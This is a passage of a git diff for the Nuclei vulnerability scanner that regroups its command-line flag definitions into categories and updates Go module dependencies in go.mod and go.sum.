nuclei-templates") - set.BoolVar(&options.JSON, "json", false, "Write json output to files") - set.BoolVarP(&options.JSONRequests, "include-rr", "irr", false, "Write requests/responses for matches in JSON output") - 
set.BoolVar(&options.EnableProgressBar, "stats", false, "Display stats of the running scan") - set.BoolVar(&options.TemplateList, "tl", false, "List available templates") - set.IntVarP(&options.RateLimit, "rate-limit", "rl", 150, "Maximum requests to send per second") - set.BoolVarP(&options.StopAtFirstMatch, "stop-at-first-path", "spm", false, "Stop processing http requests at first match (this may break template/workflow logic)") - set.IntVarP(&options.BulkSize, "bulk-size", "bs", 25, "Maximum Number of hosts analyzed in parallel per template") - set.IntVarP(&options.TemplateThreads, "concurrency", "c", 10, "Maximum Number of templates executed in parallel") - set.BoolVar(&options.Project, "project", false, "Use a project folder to avoid sending same request multiple times") - set.StringVar(&options.ProjectPath, "project-path", "", "Use a user defined project folder, temporary folder is used if not specified but enabled") - set.BoolVarP(&options.NoMeta, "no-meta", "nm", false, "Don't display metadata for the matches") - set.BoolVarP(&options.TemplatesVersion, "templates-version", "tv", false, "Shows the installed nuclei-templates version") - set.BoolVar(&options.OfflineHTTP, "passive", false, "Enable Passive HTTP response processing mode") - set.StringVarP(&options.BurpCollaboratorBiid, "burp-collaborator-biid", "biid", "", "Burp Collaborator BIID") - set.StringVarP(&options.ReportingConfig, "report-config", "rc", "", "Nuclei Reporting Module configuration file") - set.StringVarP(&options.ReportingDB, "report-db", "rdb", "", "Local Nuclei Reporting Database (Always use this to persistent report data)") - set.StringSliceVar(&options.Tags, "tags", []string{}, "Tags to execute templates for") - set.StringSliceVarP(&options.ExcludeTags, "exclude-tags", "etags", []string{}, "Exclude templates with the provided tags") - set.StringVarP(&options.ResolversFile, "resolvers", "r", "", "File containing resolver list for nuclei") - set.BoolVar(&options.Headless, "headless", false, "Enable headless browser based templates support") - set.BoolVar(&options.ShowBrowser, "show-browser", false, "Show the browser on the screen") - set.IntVarP(&options.StatsInterval, "stats-interval", "si", 5, "Number of seconds between each stats line") - set.BoolVar(&options.SystemResolvers, "system-resolvers", false, "Use system dns resolving as error fallback") - set.IntVar(&options.PageTimeout, "page-timeout", 20, "Seconds to wait for each page in headless") - set.BoolVarP(&options.NewTemplates, "new-templates", "nt", false, "Only run newly added templates") - set.StringVarP(&options.DiskExportDirectory, "disk-export", "de", "", "Directory on disk to export reports in markdown to") - set.BoolVar(&options.NoInteractsh, "no-interactsh", false, "Do not use interactsh server for blind interaction polling") - set.StringVar(&options.InteractshURL, "interactsh-url", "https://interact.sh", "Interactsh Server URL") - set.IntVar(&options.InteractionsCacheSize, "interactions-cache-size", 5000, "Number of requests to keep in interactions cache") - set.IntVar(&options.InteractionsEviction, "interactions-eviction", 60, "Number of seconds to wait before evicting requests from cache") - set.IntVar(&options.InteractionsPollDuration, "interactions-poll-duration", 5, "Number of seconds before each interaction poll request") - set.IntVar(&options.InteractionsColldownPeriod, "interactions-cooldown-period", 5, "Extra time for interaction polling before exiting") - _ = set.Parse() + flagSet := goflags.NewFlagSet() + 
flagSet.SetDescription(`Nuclei is a fast, template based vulnerability scanner focusing +on extensive configurability, massive extensibility and ease of use.`) + + createGroup(flagSet, "input", "Target", + flagSet.StringSliceVarP(&options.Targets, "target", "u", []string{}, "target URLs/hosts to scan"), + flagSet.StringVarP(&options.TargetsFilePath, "list", "l", "", "path to file containing a list of target URLs/hosts to scan (one per line)"), + ) + + createGroup(flagSet, "templates", "Templates", + flagSet.BoolVar(&options.TemplateList, "tl", false, "list all available templates"), + + flagSet.StringSliceVarP(&options.Templates, "templates", "t", []string{}, "template or template directory paths to include in the scan"), + flagSet.StringSliceVarP(&options.Workflows, "workflows", "w", []string{}, "list of workflows to run"), + + flagSet.BoolVarP(&options.NewTemplates, "new-templates", "nt", false, "run newly added templates only"), + flagSet.BoolVar(&options.Validate, "validate", false, "validate the passed templates to nuclei"), + ) + + createGroup(flagSet, "filters", "Filtering", + flagSet.NormalizedStringSliceVar(&options.Tags, "tags", []string{}, "execute a subset of templates that contain the provided tags"), + flagSet.NormalizedStringSliceVar(&options.IncludeTags, "include-tags", []string{}, "tags from the default deny list that permit executing more intrusive templates"), // TODO show default deny list + flagSet.NormalizedStringSliceVarP(&options.ExcludeTags, "exclude-tags", "etags", []string{}, "exclude templates with the provided tags"), + + flagSet.StringSliceVar(&options.IncludeTemplates, "include-templates", []string{}, "templates to be executed even if they are excluded either by default or configuration"), + flagSet.StringSliceVarP(&options.ExcludedTemplates, "exclude", "exclude-templates", []string{}, "template or template directory paths to exclude"), + + flagSet.NormalizedStringSliceVarP(&options.Severity, "impact", "severity", []string{}, "execute templates that match the provided severities only"), + flagSet.NormalizedStringSliceVar(&options.Author, "author", []string{}, "execute templates that are (co-)created by the specified authors"), + ) + + createGroup(flagSet, "output", "Output", + flagSet.StringVarP(&options.Output, "output", "o", "", "output file to write found issues/vulnerabilities"), + + flagSet.BoolVar(&options.Silent, "silent", false, "display findings only"), + flagSet.BoolVarP(&options.Verbose, "verbose", "v", false, "show verbose output"), + flagSet.BoolVar(&options.VerboseVerbose, "vv", false, "display extra verbose information"), + flagSet.BoolVarP(&options.NoColor, "no-color", "nc", false, "disable output content coloring (ANSI escape codes)"), + + flagSet.BoolVar(&options.JSON, "json", false, "write output in JSONL(ines) format"), + flagSet.BoolVarP(&options.JSONRequests, "include-rr", "irr", false, "include request/response pairs in the JSONL output (for findings only)"), + + flagSet.BoolVarP(&options.NoMeta, "no-meta", "nm", false, "don't display match metadata"), + flagSet.StringVarP(&options.ReportingDB, "report-db", "rdb", "", "local nuclei reporting database (always use this to persist report data)"), + + flagSet.StringVarP(&options.DiskExportDirectory, "markdown-export", "me", "", "directory to export results in markdown format"), + flagSet.StringVarP(&options.SarifExport, "sarif-export", "se", "", "file to export results in SARIF format"), + ) + + createGroup(flagSet, "configs", "Configurations", + flagSet.StringVar(&cfgFile, "config", "", 
"path to the nuclei configuration file"), + flagSet.StringVarP(&options.ReportingConfig, "report-config", "rc", "", "nuclei reporting module configuration file"), // TODO merge into the config file or rename to issue-tracking + + flagSet.StringSliceVarP(&options.CustomHeaders, "header", "H", []string{}, "custom headers in header:value format"), + + flagSet.StringVarP(&options.ResolversFile, "resolvers", "r", "", "file containing resolver list for nuclei"), + flagSet.BoolVar(&options.SystemResolvers, "system-resolvers", false, "use system DNS resolving as error fallback"), + flagSet.BoolVar(&options.OfflineHTTP, "passive", false, "enable passive HTTP response processing mode"), + ) + + createGroup(flagSet, "interactsh", "interactsh", + flagSet.BoolVar(&options.NoInteractsh, "no-interactsh", false, "do not use interactsh server for blind interaction polling"), + flagSet.StringVar(&options.InteractshURL, "interactsh-url", "https://interact.sh", "self-hosted Interactsh Server URL"), + + flagSet.IntVar(&options.InteractionsCacheSize, "interactions-cache-size", 5000, "number of requests to keep in the interactions cache"), + flagSet.IntVar(&options.InteractionsEviction, "interactions-eviction", 60, "number of seconds to wait before evicting requests from cache"), + flagSet.IntVar(&options.InteractionsPollDuration, "interactions-poll-duration", 5, "number of seconds to wait before each interaction poll request"), + flagSet.IntVar(&options.InteractionsColldownPeriod, "interactions-cooldown-period", 5, "extra time for interaction polling before exiting"), + ) + + createGroup(flagSet, "rate-limit", "Rate-Limit", + flagSet.IntVarP(&options.RateLimit, "rate-limit", "rl", 150, "maximum number of requests to send per second"), + flagSet.IntVarP(&options.RateLimitMinute, "rate-limit-minute", "rlm", 0, "maximum number of requests to send per minute"), + flagSet.IntVarP(&options.BulkSize, "bulk-size", "bs", 25, "maximum number of hosts to be analyzed in parallel per template"), + flagSet.IntVarP(&options.TemplateThreads, "concurrency", "c", 10, "maximum number of templates to be executed in parallel"), + ) + + createGroup(flagSet, "optimization", "Optimizations", + flagSet.IntVar(&options.Timeout, "timeout", 5, "time to wait in seconds before timeout"), + flagSet.IntVar(&options.Retries, "retries", 1, "number of times to retry a failed request"), + + flagSet.BoolVar(&options.Project, "project", false, "use a project folder to avoid sending same request multiple times"), + flagSet.StringVar(&options.ProjectPath, "project-path", os.TempDir(), "set a specific project path"), + + flagSet.BoolVarP(&options.StopAtFirstMatch, "stop-at-first-path", "spm", false, "stop processing HTTP requests after the first match (may break template/workflow logic)"), + ) + + createGroup(flagSet, "headless", "Headless", + flagSet.BoolVar(&options.Headless, "headless", false, "enable templates that require headless browser support"), + flagSet.IntVar(&options.PageTimeout, "page-timeout", 20, "seconds to wait for each page in headless mode"), + flagSet.BoolVar(&options.ShowBrowser, "show-browser", false, "show the browser on the screen when running templates with headless mode"), + ) + + createGroup(flagSet, "debug", "Debug", + flagSet.BoolVar(&options.Debug, "debug", false, "show all requests and responses"), + flagSet.BoolVar(&options.DebugRequests, "debug-req", false, "show all sent requests"), + flagSet.BoolVar(&options.DebugResponse, "debug-resp", false, "show all received responses"), + + /* TODO why the separation? 
http://proxy:port vs socks5://proxy:port etc + TODO should auto-set the HTTP_PROXY variable for the process? */ + flagSet.StringVarP(&options.ProxyURL, "proxy-url", "proxy", "", "URL of the HTTP proxy server"), + flagSet.StringVar(&options.ProxySocksURL, "proxy-socks-url", "", "URL of the SOCKS proxy server"), + + flagSet.StringVar(&options.TraceLogFile, "trace-log", "", "file to write sent requests trace log"), + + flagSet.BoolVar(&options.Version, "version", false, "show nuclei version"), + flagSet.BoolVarP(&options.TemplatesVersion, "templates-version", "tv", false, "shows the version of the installed nuclei-templates"), + ) + + createGroup(flagSet, "update", "Update", + flagSet.BoolVar(&options.UpdateNuclei, "update", false, "update nuclei to the latest released version"), + flagSet.BoolVarP(&options.UpdateTemplates, "update-templates", "ut", false, "update the community templates to latest released version"), + flagSet.BoolVarP(&options.NoUpdateTemplates, "no-update-templates", "nut", false, "Do not check for nuclei-templates updates"), + flagSet.StringVarP(&options.TemplatesDirectory, "update-directory", "ud", templatesDirectory, "overwrite the default nuclei-templates directory"), + ) + + createGroup(flagSet, "stats", "Statistics", + flagSet.BoolVar(&options.EnableProgressBar, "stats", false, "display statistics about the running scan"), + flagSet.BoolVar(&options.StatsJSON, "stats-json", false, "write statistics data to an output file in JSONL(ines) format"), + flagSet.IntVarP(&options.StatsInterval, "stats-interval", "si", 5, "number of seconds to wait between showing a statistics update"), + + flagSet.BoolVar(&options.Metrics, "metrics", false, "expose nuclei metrics on a port"), + flagSet.IntVar(&options.MetricsPort, "metrics-port", 9092, "port to expose nuclei metrics on"), + ) + + flagSet.StringSliceVarP(&options.AdvancedWorkflows, "advanced-workflows", "wa", []string{}, "Advanced workflows to run for nuclei") + + _ = flagSet.Parse() if cfgFile != "" { - if err := set.MergeConfigFile(cfgFile); err != nil { + if err := flagSet.MergeConfigFile(cfgFile); err != nil { gologger.Fatal().Msgf("Could not read config: %s\n", err) } } } + +func createGroup(flagSet *goflags.FlagSet, groupName, description string, flags ...*goflags.FlagData) { + flagSet.SetGroup(groupName, description) + for _, currentFlag := range flags { + currentFlag.Group(groupName) + } +} diff --git a/v2/go.mod b/v2/go.mod index 0a7c4a2d7e..13d3132f22 100644 --- a/v2/go.mod +++ b/v2/go.mod @@ -3,18 +3,23 @@ module github.com/projectdiscovery/nuclei/v2 go 1.15 require ( + github.com/Knetic/govaluate v3.0.0+incompatible github.com/andygrunwald/go-jira v1.13.0 + github.com/apex/log v1.9.0 github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d // indirect github.com/blang/semver v3.5.1+incompatible + github.com/c4milo/unpackit v0.1.0 // indirect github.com/corpix/uarand v0.1.1 github.com/fatih/structs v1.1.0 // indirect github.com/go-rod/rod v0.96.0 github.com/golang/protobuf v1.5.1 // indirect github.com/golang/snappy v0.0.3 // indirect github.com/google/go-github v17.0.0+incompatible - github.com/google/go-github/v32 v32.1.0 + github.com/gosuri/uilive v0.0.4 // indirect + github.com/gosuri/uiprogress v0.0.1 // indirect github.com/hashicorp/go-cleanhttp v0.5.2 // indirect github.com/hashicorp/go-retryablehttp v0.6.8 // indirect + github.com/itchyny/gojq v0.12.4 github.com/json-iterator/go v1.1.10 github.com/julienschmidt/httprouter v1.3.0 github.com/karlseguin/ccache v2.0.3+incompatible @@ -22,28 +27,31 @@ 
require ( github.com/logrusorgru/aurora v2.0.3+incompatible github.com/mattn/go-runewidth v0.0.10 // indirect github.com/miekg/dns v1.1.41 - github.com/mitchellh/go-ps v1.0.0 github.com/olekukonko/tablewriter v0.0.5 + github.com/owenrumney/go-sarif v1.0.4 github.com/pkg/errors v0.9.1 github.com/projectdiscovery/clistats v0.0.8 - github.com/projectdiscovery/collaborator v0.0.2 github.com/projectdiscovery/fastdialer v0.0.9 - github.com/projectdiscovery/goflags v0.0.4 + github.com/projectdiscovery/goflags v0.0.6 github.com/projectdiscovery/gologger v1.1.4 github.com/projectdiscovery/hmap v0.0.1 - github.com/projectdiscovery/interactsh v0.0.2 + github.com/projectdiscovery/interactsh v0.0.3 github.com/projectdiscovery/mapsutil v0.0.1 - github.com/projectdiscovery/rawhttp v0.0.6 + github.com/projectdiscovery/rawhttp v0.0.7 github.com/projectdiscovery/retryabledns v1.0.10 - github.com/projectdiscovery/retryablehttp-go v1.0.1 + github.com/projectdiscovery/retryablehttp-go v1.0.2-0.20210524224054-9fbe1f2b0727 github.com/projectdiscovery/starlight v0.0.0-20210322151037-9b9e2da4e8b7 + github.com/projectdiscovery/stringsutil v0.0.0-20210617141317-00728870f68d github.com/remeh/sizedwaitgroup v1.0.0 github.com/rivo/uniseg v0.2.0 // indirect github.com/rs/xid v1.2.1 github.com/segmentio/ksuid v1.0.3 + github.com/shirou/gopsutil/v3 v3.21.5 + github.com/spaolacci/murmur3 v1.1.0 github.com/spf13/cast v1.3.1 github.com/stretchr/testify v1.7.0 github.com/syndtr/goleveldb v1.0.0 + github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible github.com/trivago/tgo v1.0.7 // indirect github.com/valyala/fasttemplate v1.2.1 github.com/xanzy/go-gitlab v0.47.0 @@ -51,11 +59,8 @@ require ( go.uber.org/atomic v1.7.0 go.uber.org/multierr v1.6.0 go.uber.org/ratelimit v0.2.0 - golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2 // indirect - golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4 + golang.org/x/net v0.0.0-20210521195947-fe42d452be8f golang.org/x/oauth2 v0.0.0-20210313182246-cd4f82c27b84 - golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4 // indirect - golang.org/x/text v0.3.4 // indirect golang.org/x/time v0.0.0-20210220033141-f8bda1e9f3ba // indirect google.golang.org/appengine v1.6.7 // indirect gopkg.in/yaml.v2 v2.4.0 diff --git a/v2/go.sum b/v2/go.sum index 7b3e7227f4..a2b248f089 100644 --- a/v2/go.sum +++ b/v2/go.sum @@ -33,18 +33,34 @@ cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9 dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= +github.com/Knetic/govaluate v3.0.0+incompatible h1:7o6+MAPhYTCF0+fdvoz1xDedhRb4f6s9Tn1Tt7/WTEg= +github.com/Knetic/govaluate v3.0.0+incompatible/go.mod h1:r7JcOSlj0wfOMncg0iLm8Leh48TZaKVeNIfJntJ2wa0= github.com/Masterminds/glide v0.13.2/go.mod h1:STyF5vcenH/rUqTEv+/hBXlSTo7KYwg2oc2f4tzPWic= github.com/Masterminds/semver v1.4.2/go.mod h1:MB6lktGJrhw8PrUyiEoblNEGEQ+RzHPF078ddwwvV3Y= github.com/Masterminds/vcs v1.13.0/go.mod h1:N09YCmOQr6RLxC6UNHzuVwAdodYbbnycGHSmwVJjcKA= +github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d h1:G0m3OIz70MZUWq3EgK3CesDbo8upS2Vm9/P3FtgI+Jk= +github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d/go.mod h1:3eOhrUMpNV+6aFIbp5/iudMxNCF27Vw2OZgy4xEx0Fg= github.com/andres-erbsen/clock 
v0.0.0-20160526145045-9e14626cd129 h1:MzBOUgng9orim59UnfUTLRjMpd09C5uEVQ6RPGeCaVI= github.com/andres-erbsen/clock v0.0.0-20160526145045-9e14626cd129/go.mod h1:rFgpPQZYZ8vdbc+48xibu8ALc3yeyd64IhHS+PU6Yyg= github.com/andygrunwald/go-jira v1.13.0 h1:vvIImGgX32bHfoiyUwkNo+/YrPnRczNarvhLOncP6dE= github.com/andygrunwald/go-jira v1.13.0/go.mod h1:jYi4kFDbRPZTJdJOVJO4mpMMIwdB+rcZwSO58DzPd2I= +github.com/apex/log v1.9.0 h1:FHtw/xuaM8AgmvDDTI9fiwoAL25Sq2cxojnZICUU8l0= +github.com/apex/log v1.9.0/go.mod h1:m82fZlWIuiWzWP04XCTXmnX0xRkYYbCdYn8jbJeLBEA= +github.com/apex/logs v1.0.0/go.mod h1:XzxuLZ5myVHDy9SAmYpamKKRNApGj54PfYLcFrXqDwo= +github.com/aphistic/golf v0.0.0-20180712155816-02c07f170c5a/go.mod h1:3NqKYiepwy8kCu4PNA+aP7WUV72eXWJeP9/r3/K9aLE= +github.com/aphistic/sweet v0.2.0/go.mod h1:fWDlIh/isSE9n6EPsRmC0det+whmX6dJid3stzu0Xys= +github.com/apparentlymart/go-textseg/v13 v13.0.0/go.mod h1:ZK2fH7c4NqDTLtiYLvIkEghdlcqw7yxLeM89kiTRPUo= github.com/asaskevich/govalidator v0.0.0-20200907205600-7a23bdc65eef/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d h1:Byv0BzEl3/e6D5CLfI0j/7hiIEtvGVFPCZ7Ei2oq8iQ= github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= +github.com/aws/aws-sdk-go v1.20.6/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo= +github.com/aybabtme/rgbterm v0.0.0-20170906152045-cc83f3b3ce59/go.mod h1:q/89r3U2H7sSsE2t6Kca0lfwTK8JdoNGS/yzM/4iH5I= github.com/blang/semver v3.5.1+incompatible h1:cQNTCjp13qL8KC3Nbxr/y2Bqb63oX6wdnnjpJbkM4JQ= github.com/blang/semver v3.5.1+incompatible/go.mod h1:kRBLl5iJ+tD4TcOOxsy/0fnwebNt5EWlYSAyrTnjyyk= +github.com/bradfitz/iter v0.0.0-20191230175014-e8f45d346db8 h1:GKTyiRCL6zVf5wWaqKnf+7Qs6GbEPfd4iMOitWzXJx8= +github.com/bradfitz/iter v0.0.0-20191230175014-e8f45d346db8/go.mod h1:spo1JLcs67NmW1aVLEgtA8Yy1elc+X8y5SRW1sFW4Og= +github.com/c4milo/unpackit v0.1.0 h1:91pWJ6B3svZ4LOE+p3rnyucRK5fZwBdF/yQ/pcZO31I= +github.com/c4milo/unpackit v0.1.0/go.mod h1:pvXCMYlSV8zwGFWMaT+PWYkAB/cvDjN2mv9r7ZRSxEo= github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/chzyer/logex v1.1.10/go.mod h1:+Ywpsq7O8HXn0nuIou7OrIPyXbp3wmkHB+jjWRnGsAI= github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e/go.mod h1:nSuG5e5PlCu98SY8svDHJxuZscDgtXS6KTTbou5AhLI= @@ -64,12 +80,16 @@ github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumC github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ= github.com/dimchansky/utfbom v1.1.1 h1:vV6w1AhK4VMnhBno/TPVCoK9U/LP0PkLCS9tbxHdi/U= github.com/dimchansky/utfbom v1.1.1/go.mod h1:SxdoEBH5qIqFocHMyGOXVAybYJdr71b1Q/j0mACtrfE= +github.com/dsnet/compress v0.0.1 h1:PlZu0n3Tuv04TzpfPbrnI0HW/YwodEXDS+oPKahKF0Q= +github.com/dsnet/compress v0.0.1/go.mod h1:Aw8dCMJ7RioblQeTqt88akK31OvO8Dhf5JflhBbQEHo= +github.com/dsnet/golib v0.0.0-20171103203638-1ea166775780/go.mod h1:Lj+Z9rebOhdfkVLjJ8T6VcRQv3SXugXy999NBtR9aFY= github.com/eggsampler/acme/v3 v3.2.1 h1:Lfsrg3M2zt00QRnizOFzdpSfsS9oDvPsGrodXS/w1KI= github.com/eggsampler/acme/v3 v3.2.1/go.mod h1:/qh0rKC/Dh7Jj+p4So7DbWmFNzC4dpcpK53r226Fhuo= github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.4/go.mod 
h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= +github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= github.com/fatih/structs v1.0.0/go.mod h1:9NiDSp5zOcgEDl+j00MP/WkGVPOlPRLejGD8Ga6PJ7M= github.com/fatih/structs v1.1.0 h1:Q7juDM0QtcnhCpeyLGQKyg4TOIghuNXrkL32pHAUMxo= github.com/fatih/structs v1.1.0/go.mod h1:9NiDSp5zOcgEDl+j00MP/WkGVPOlPRLejGD8Ga6PJ7M= @@ -78,6 +98,9 @@ github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMo github.com/go-gl/glfw v0.0.0-20190409004039-e6da0acd62b1/go.mod h1:vR7hzQXu2zJy9AVAgeJqvqgH9Q5CA+iKCZ2gyEVpxRU= github.com/go-gl/glfw/v3.3/glfw v0.0.0-20191125211704-12ad95a8df72/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8= github.com/go-gl/glfw/v3.3/glfw v0.0.0-20200222043503-6f7a984d4dc4/go.mod h1:tQ2UAYgL5IevRw8kRxooKSPJfGvJ9fJQFa0TUsXzTg8= +github.com/go-logfmt/logfmt v0.4.0/go.mod h1:3RMwSq7FuexP4Kalkev3ejPJsZTpXXBr9+V4qmtdjCk= +github.com/go-ole/go-ole v1.2.4 h1:nNBDSCOigTSiarFpYE9J/KtEA1IOW4CNeqT9TQDqCxI= +github.com/go-ole/go-ole v1.2.4/go.mod h1:XCwSNxSkXRo4vlyPy93sltvi/qJq0jqQhjqQNIwKuxM= github.com/go-redis/redis v6.15.5+incompatible/go.mod h1:NAIEuMOZ/fxfXJIrKDQDz8wamY7mA7PouImQ2Jvg6kA= github.com/go-rod/rod v0.96.0 h1:XCeDDxiRFuCvDgU7yHuKnZf0AE6Kh6a3LrRHMUAq2xE= github.com/go-rod/rod v0.96.0/go.mod h1:cIR84WFrMAwShOkmIJcuJZDyKLjQq3yiZSMEhawHktc= @@ -121,17 +144,15 @@ github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/ github.com/google/go-cmp v0.4.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-github v17.0.0+incompatible h1:N0LgJ1j65A7kfXrZnUDaYCs/Sf4rEjNlfyDHW9dolSY= github.com/google/go-github v17.0.0+incompatible/go.mod h1:zLgOLi98H3fifZn+44m+umXrS52loVEgC2AApnigrVQ= -github.com/google/go-github/v32 v32.1.0 h1:GWkQOdXqviCPx7Q7Fj+KyPoGm4SwHRh8rheoPhd27II= -github.com/google/go-github/v32 v32.1.0/go.mod h1:rIEpZD9CTDQwDK9GDrtMTycQNA4JU3qBsCizh3q2WCI= github.com/google/go-querystring v0.0.0-20170111101155-53e6ce116135/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck= github.com/google/go-querystring v1.0.0 h1:Xkwi/a1rcvNg1PPYe5vI8GbeBY/jrVuDX5ASuANWTrk= github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= -github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo= github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs= github.com/google/martian/v3 v3.0.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0= github.com/google/pprof v0.0.0-20181206194817-3ea8567a2e57/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc= @@ -142,10 +163,15 @@ github.com/google/pprof v0.0.0-20200229191704-1ebb73c60ed3/go.mod h1:ZgVRPoUq/hf github.com/google/pprof v0.0.0-20200430221834-fc25d7d30c6d/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= github.com/google/pprof v0.0.0-20200708004538-1a94d8640e99/go.mod 
h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs= github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= +github.com/gosuri/uilive v0.0.4 h1:hUEBpQDj8D8jXgtCdBu7sWsy5sbW/5GhuO8KBwJ2jyY= +github.com/gosuri/uilive v0.0.4/go.mod h1:V/epo5LjjlDE5RJUcqx8dbw+zc93y5Ya3yg8tfZ74VI= +github.com/gosuri/uiprogress v0.0.1 h1:0kpv/XY/qTmFWl/SkaJykZXrBBzwwadmW8fRb7RJSxw= +github.com/gosuri/uiprogress v0.0.1/go.mod h1:C1RTYn4Sc7iEyf6j8ft5dyoZ4212h8G1ol9QQluh5+0= github.com/hashicorp/go-cleanhttp v0.5.1/go.mod h1:JpRdi6/HCYpAwUzNwuwqhbovhLtngrth3wmdIIUrZ80= github.com/hashicorp/go-cleanhttp v0.5.2 h1:035FKYIWjmULyFRBKPs8TBQoi0x6d9G4xc9neXJWAZQ= github.com/hashicorp/go-cleanhttp v0.5.2/go.mod h1:kO/YDlP8L1346E6Sodw+PrpBSV4/SoxCXGY6BqNFT48= @@ -156,13 +182,22 @@ github.com/hashicorp/go-retryablehttp v0.6.8 h1:92lWxgpa+fF3FozM4B3UZtHZMJX8T5XT github.com/hashicorp/go-retryablehttp v0.6.8/go.mod h1:vAew36LZh98gCBJNLH42IQ1ER/9wtLZZ8meHqQvEYWY= github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= +github.com/hooklift/assert v0.1.0 h1:UZzFxx5dSb9aBtvMHTtnPuvFnBvcEhHTPb9+0+jpEjs= +github.com/hooklift/assert v0.1.0/go.mod h1:pfexfvIHnKCdjh6CkkIZv5ic6dQ6aU2jhKghBlXuwwY= github.com/hpcloud/tail v1.0.0 h1:nfCOvKYfkgYP8hkirhJocXT2+zOD8yUNjXaWfTlyFKI= 